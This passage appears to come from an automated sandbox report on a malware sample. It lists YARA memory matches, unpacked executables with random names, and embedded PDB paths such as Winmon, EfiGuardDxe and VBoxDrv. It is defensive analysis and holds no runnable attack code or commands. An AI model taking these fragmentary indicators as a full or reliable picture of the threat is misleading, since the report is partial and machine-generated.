                  Source: Yara matchFile source: 00000021.00000002.3183308151.0000000000843000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3298037878.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3398211956.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.3043788624.0000000000843000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3409633902.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3061309929.0000000000843000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3263335917.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3250452098.00000000032C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3259586341.0000000000843000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VT4T5BrKWgz9d48cmEd8ePkZ.exe PID: 7280, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: sUyDoVTGsfEnMY0oeyexTBut.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VvPx7JMqkEvTJAQ2rPS2y2wf.exe PID: 7392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe PID: 7568, type: MEMORYSTR

                  Compliance

                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe, Unpacked PE file: 15.2.syncUpd.exe.400000.0.unpack
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe, Unpacked PE file: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe, Unpacked PE file: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe, Unpacked PE file: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, Unpacked PE file: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe, Unpacked PE file: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe, Unpacked PE file: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe, Unpacked PE file: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe, Unpacked PE file: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe, Unpacked PE file: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: dl7WL77rkA.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: Loader.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: EfiGuardDxe.pdb7 source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp
                  Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: symsrv.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000003619000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003689000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003639000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000003529000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000C7A000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Unable to locate the .pdb file in this location source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
